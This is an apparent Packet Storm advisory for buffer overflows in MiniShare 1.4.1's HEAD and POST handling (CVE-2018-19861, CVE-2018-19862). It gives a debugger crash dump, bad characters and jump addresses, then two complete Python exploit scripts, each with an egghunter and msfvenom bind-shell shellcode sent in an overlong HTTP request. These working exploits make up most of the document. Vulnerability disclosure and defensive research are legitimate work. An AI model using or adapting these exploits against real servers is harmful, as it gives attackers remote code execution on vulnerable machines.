MiniShare 1.4.1 HEAD / POST Buffer Overflow

2018-12-07T00:00:00
ID PACKETSTORM:150689
Type packetstorm
Reporter Rafael Pedrero
Modified 2018-12-07T00:00:00

Description

                                        
                                            `Hi!!! playing in 2006.... I have adapted the exploit to python  
  
Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST  
methods are also vulnerable. The difference is minimal, both are exploited  
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length  
  
-------------------------------------------------------------------  
  
EAX 00000000  
ECX 77C3EF3B msvcrt.77C3EF3B  
EDX 00F14E38  
EBX 43346843  
ESP 01563908 ASCII  
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co  
HTTP/1.1  
"  
EBP 0156BB90  
ESI 00000001  
EDI 01565B68  
EIP 68433568  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 1 CS 001B 32bit 0(FFFFFFFF)  
A 1 SS 0023 32bit 0(FFFFFFFF)  
Z 0 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 003B 32bit 7FFDD000(FFF)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_SUCCESS (00000000)  
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)  
ST0 empty  
ST1 empty  
ST2 empty  
ST3 empty  
ST4 empty  
ST5 empty  
ST6 empty  
ST7 empty  
3 2 1 0 E S P U O Z D I  
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
------------------------------------------------------------------------------  
  
Only 210 bytes to shellcode  
  
------------------------------------------------------------------------------  
  
Badchars '00','0d'  
  
------------------------------------------------------------------------------  
  
>findjmp kernel32.dll esp - XP SP 3 English  
  
Scanning kernel32.dll for code useable with the esp register  
0x7C809F83 call esp  
0x7C8369E0 call esp  
0x7C83C2C5 push esp - ret  
0x7C87641B call esp  
  
  
<!--  
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.  
# Date: 05-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://minishare.sourceforge.net/  
# Software Link: http://minishare.sourceforge.net/  
# Version: Minishare v1.4.1  
# Tested on: Windows  
# CVE : CVE-2018-19861  
# Category: exploit  
  
1. Description  
  
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP HEAD request.  
  
  
2. Proof of Concept  
  
Exploit:  
  
#!/usr/bin/env python  
import socket  
import struct  
import os  
  
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP HEAD request - by Rafa  
# CVE: CVE-2018-19861  
# Via Egghunter because shellcode in ESP only 210 bytes long.  
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/  
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
host = "127.0.0.1"  
port = 80  
  
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34  
egghunter =  
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  
  
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f  
python -a x86 --platform windows -b "\x00\x0d" -f c  
#Found 10 compatible encoders  
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai  
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)  
#x86/shikata_ga_nai chosen with final size 355  
#Payload size: 355 bytes  
#Final size of c file: 1516 bytes  
#unsigned char buf[] =  
shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"  
"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"  
"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"  
"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"  
"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"  
"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"  
"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"  
"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"  
"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"  
"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"  
"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"  
"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"  
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"  
"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"  
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"  
"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"  
"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"  
"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"  
"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"  
"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"  
"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"  
"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"  
"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"  
"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")  
  
# findjmp kernel32.dll esp - WinXP SP3 English  
#0x7C809F83 call esp  
  
nops = "\x90" * 16  
  
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -  
1786 - 4 - 16 - len(egghunter))  
  
try:  
print "Sending exploit..."  
connection.connect((host,port))  
buffer = (  
"HEAD " + junk + " HTTP/1.1\r\n"  
"Host: " + shellcode + "\r\n\r\n")  
  
connection.send(buffer)  
connection.close()  
print "\nExploit Sended ", len(buffer)  
except:  
print "Connection error"  
  
  
  
3. Solution:  
  
This product is deprecated  
  
-->  
  
  
<!--  
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.  
# Date: 05-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://minishare.sourceforge.net/  
# Software Link: http://minishare.sourceforge.net/  
# Version: Minishare v1.4.1  
# Tested on: Windows  
# CVE : CVE-2018-19862  
# Category: exploit  
  
1. Description  
  
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP POST request.  
  
  
2. Proof of Concept  
  
Exploit:  
  
#!/usr/bin/env python  
import socket  
import struct  
import os  
  
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to  
execute arbitrary code via a long HTTP POST request - by Rafa  
# CVE: CVE-2018-19862  
# Via Egghunter because shellcode in ESP only 210 bytes long.  
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/  
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
host = "127.0.0.1"  
port = 80  
  
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34  
egghunter =  
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  
  
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f  
python -a x86 --platform windows -b "\x00\x0d" -f c  
#Found 10 compatible encoders  
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai  
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)  
#x86/shikata_ga_nai chosen with final size 355  
#Payload size: 355 bytes  
#Final size of c file: 1516 bytes  
#unsigned char buf[] =  
shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"  
"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"  
"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"  
"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"  
"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"  
"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"  
"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"  
"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"  
"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"  
"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"  
"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"  
"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"  
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"  
"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"  
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"  
"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"  
"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"  
"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"  
"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"  
"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"  
"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"  
"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"  
"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"  
"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")  
  
# findjmp kernel32.dll esp - WinXP SP3 English  
#0x7C809F83 call esp  
  
nops = "\x90" * 16  
  
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -  
1786 - 4 - 16 - len(egghunter))  
  
try:  
print "Sending exploit..."  
connection.connect((host,port))  
  
buffer = (  
"POST " + junk + " HTTP/1.1\r\n"  
"Host: " + shellcode + "\r\n\r\n")  
  
connection.send(buffer)  
connection.close()  
print "\nExploit Sended ", len(buffer)  
except:  
print "Connection error"  
  
  
  
3. Solution:  
  
This product is deprecated  
  
-->  
  
  
`